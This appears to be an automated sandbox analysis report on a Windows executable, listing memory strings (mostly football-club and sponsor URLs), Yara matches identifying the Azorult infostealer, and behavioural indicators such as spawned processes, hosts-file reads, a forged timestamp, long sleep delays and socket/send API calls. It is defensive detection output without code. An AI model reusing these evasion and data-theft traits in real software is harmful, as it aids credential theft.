                Source: hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://members.liverpoolfc.com/login
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://mg.co.uk/
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://plus.google.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpString found in binary or memory: https://pubads.g.doubleclick.net/gampad/ads?sz=640x480&iu=/
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://schema.org/Organization
                Source: hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpString found in binary or memory: https://sdk.privacy-center.org/loader.js
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://secure.widget.cloud.opta.net/v3/v3.opta-widgets.js
                Source: hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://store.liverpoolfc.com/customer/account/login/
                Source: hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://ticketing.liverpoolfc.com/ClientRequiredFallback.aspx?view=Login&amp;next=%2fCrmDetails.aspx
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://tribus-watches.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/ManUtd
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://uk.joiebaby.com/liverpoolfc/
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://uk.tigerwit.com/about/liverpool
                Source: hfLfKDTosA.exe, 00000006.00000002.372036082.0000000000EE8000.00000004.00000020.sdmpString found in binary or memory: https://watson.telemet
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.acronis.com/en-gb/
                Source: hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpString found in binary or memory: https://www.axa.com/?utm_source=liverpoolfc&amp;utm_medium=logo-partnership&amp;utm_campaign=lfc1819
                Source: hfLfKDTosA.exe, 00000002.00000002.373988549.0000000002F66000.00000004.00000001.sdmpString found in binary or memory: https://www.chelseafc.com
                Source: hfLfKDTosA.exeString found in binary or memory: https://www.digicert.com/CPS0
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.easports.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.expedia.co.uk/
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmp, hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M54566
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.hcltech.com/unitedbyhcl
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.hollyfrontier.com/home/default.aspx
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.levi.com/GB/en_GB/
                Source: hfLfKDTosA.exe, 00000002.00000002.374071777.0000000002FC2000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com
                Source: hfLfKDTosA.exe, 00000002.00000002.374071777.0000000002FC2000.00000004.00000001.sdmp, hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/first-team/fixtures-and-results
                Source: hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/membership
                Source: hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/my-lfc/join/user-details?user_type=free
                Source: hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/my-lfc/login?fragment=&amp;referer=http://www.liverpoolfc.com
                Source: hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/my-lfc/login?fragment=&amp;referer=http://www.liverpoolfc.com/video
                Source: hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/tickets
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.mancity.com
                Source: hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmp, hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.mancity.com/base/SPEqtpfdsaeFqgTZQsvyOXtjwhRSmtsPkVJcLGxKDbMLBpaXNarFtbHlhWinkfNKnAglkXf
                Source: hfLfKDTosA.exe, 00000002.00000002.373988549.0000000002F66000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.373988549.0000000002F66000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Help/Accessibility
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Help/Privacy-Policy
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/help/club-contacts?int_source=manutd.com&amp;int_medium=menu&amp;int_campa
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/partners/global/marriott-hotels
                Source: hfLfKDTosA.exe, 00000002.00000002.373988549.0000000002F66000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com4
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.mitel.com/learn/case-studies/liverpool-football-club
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.mondelezinternational.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpString found in binary or memory: https://www.nike.com/gb/
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.quorn.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.374071777.0000000002FC2000.00000004.00000001.sdmpString found in binary or memory: https://www.realmadrid.com
                Source: hfLfKDTosA.exe, 00000002.00000002.374071777.0000000002FC2000.00000004.00000001.sdmp, hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://www.realmadrid.com/base/SPEqtpfdsaeFqgTZQsvyOXtjwhRSmtsPkVJcLGxKDbMLBpaXNarFtbHlhWinkfNKnAgl
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.snapchat.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.tourism-mauritius.mu
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.twitter.com/realmadrid
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/manutd
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/realmadrid
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
                Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 6.2.hfLfKDTosA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                Source: 6.2.hfLfKDTosA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 6.2.hfLfKDTosA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                Source: 6.2.hfLfKDTosA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 2_2_0141D0042_2_0141D004
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 2_2_0141B1842_2_0141B184
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 2_2_0141F4702_2_0141F470
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: String function: 00403B98 appears 44 times
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: String function: 00404E64 appears 33 times
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: String function: 00404E3C appears 87 times
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: String function: 004062D8 appears 34 times
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: String function: 004034E4 appears 36 times
                Source: hfLfKDTosA.exeStatic PE information: invalid certificate
                Source: hfLfKDTosA.exe, 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKtfR FXH.exe2 vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000002.00000002.378765813.00000000062F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000002.00000002.373950117.0000000002F31000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000002.00000002.379142574.00000000069B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHIT.dll* vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000002.00000000.328537776.0000000000AA6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameget_EditedFormattedValue.exeR vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000005.00000002.366293367.00000000003D6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameget_EditedFormattedValue.exeR vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exeBinary or memory string: OriginalFilename vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameKtfR FXH.exe2 vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000006.00000002.371712175.00000000007E6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameget_EditedFormattedValue.exeR vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exeBinary or memory string: OriginalFilenameget_EditedFormattedValue.exeR vs hfLfKDTosA.exe
                Source: 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 6.2.hfLfKDTosA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 6.2.hfLfKDTosA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 6.2.hfLfKDTosA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 6.2.hfLfKDTosA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: classification engineClassification label: mal92.troj.spyw.winEXE@5/4@23/4
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeFile created: C:\Users\user\AppData\Local\BbgzvTZwbLOGmSgJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-7A741079-B8DA4441-FDF68348
                Source: hfLfKDTosA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: hfLfKDTosA.exeVirustotal: Detection: 22%
                Source: hfLfKDTosA.exeReversingLabs: Detection: 20%
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeFile read: C:\Users\user\Desktop\hfLfKDTosA.exe:Zone.IdentifierJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\hfLfKDTosA.exe 'C:\Users\user\Desktop\hfLfKDTosA.exe'
                Source: unknownProcess created: C:\Users\user\Desktop\hfLfKDTosA.exe C:\Users\user\Desktop\hfLfKDTosA.exe
                Source: unknownProcess created: C:\Users\user\Desktop\hfLfKDTosA.exe C:\Users\user\Desktop\hfLfKDTosA.exe
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess created: C:\Users\user\Desktop\hfLfKDTosA.exe C:\Users\user\Desktop\hfLfKDTosA.exeJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess created: C:\Users\user\Desktop\hfLfKDTosA.exe C:\Users\user\Desktop\hfLfKDTosA.exeJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: hfLfKDTosA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: hfLfKDTosA.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                Data Obfuscation:

                barindex
                Binary contains a suspicious time stampShow sources
                Source: initial sampleStatic PE information: 0xFABC5879 [Sun Apr 22 01:10:17 2103 UTC]
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00418124 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WSAStartup,socket,gethostbyname,htons,connect,send,closesocket,6_2_00418124
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040D86E push 0040D89Ch; ret 6_2_0040D894
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040D870 push 0040D89Ch; ret 6_2_0040D894
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_004140C0 push 004140ECh; ret 6_2_004140E4
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_004108C8 push 004108F4h; ret 6_2_004108EC
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040B0F7 push 0040B124h; ret 6_2_0040B11C
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040B0F8 push 0040B124h; ret 6_2_0040B11C
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00408080 push 004080B8h; ret 6_2_004080B0
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00408158 push 00408196h; ret 6_2_0040818E
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00408970 push 004089E4h; ret 6_2_004089DC
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00408994 push 004089E4h; ret 6_2_004089DC
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_004089AC push 004089E4h; ret 6_2_004089DC
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00415208 push 0041528Ch; ret 6_2_00415284
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040CA0C push 0040CA3Ch; ret 6_2_0040CA34
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040CA10 push 0040CA3Ch; ret 6_2_0040CA34
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00417AEC push 00417B18h; ret 6_2_00417B10
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00404BC0 push 00404C11h; ret 6_2_00404C09
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040D3C0 push 0040D3ECh; ret 6_2_0040D3E4
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040A3E4 push 0040A410h; ret 6_2_0040A408
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040C390 push 0040C3C0h; ret 6_2_0040C3B8
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040C394 push 0040C3C0h; ret 6_2_0040C3B8
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040A3AC push 0040A3D8h; ret 6_2_0040A3D0
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040DC44 push 0040DCA3h; ret 6_2_0040DC9B
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040DC0C push 0040DC38h; ret 6_2_0040DC30
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0041B417 push ecx; iretd 6_2_0041B427
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040B41E push 0040B44Ch; ret 6_2_0040B444
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040B420 push 0040B44Ch; ret 6_2_0040B444
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040A438 push 0040A464h; ret 6_2_0040A45C
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0041A4F4 push 0041A51Ah; ret 6_2_0041A512
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00414C80 push 00414CACh; ret 6_2_00414CA4
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00409488 push 004094B8h; ret 6_2_004094B0
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0041A4AC push 0041A4E8h; ret 6_2_0041A4E0
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_00417B1A
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe TID: 956Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe TID: 2916Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe TID: 7140Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0041303C FindFirstFileW,FindNextFileW,FindClose,6_2_0041303C
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,6_2_004111C4
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,6_2_00414408
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,6_2_00414408
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,6_2_00412D70
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,6_2_00412D70
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,6_2_00412D70
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0041158C FindFirstFileW,FindNextFileW,FindClose,6_2_0041158C
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00411590 FindFirstFileW,FindNextFileW,FindClose,6_2_00411590
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,6_2_00412D9C
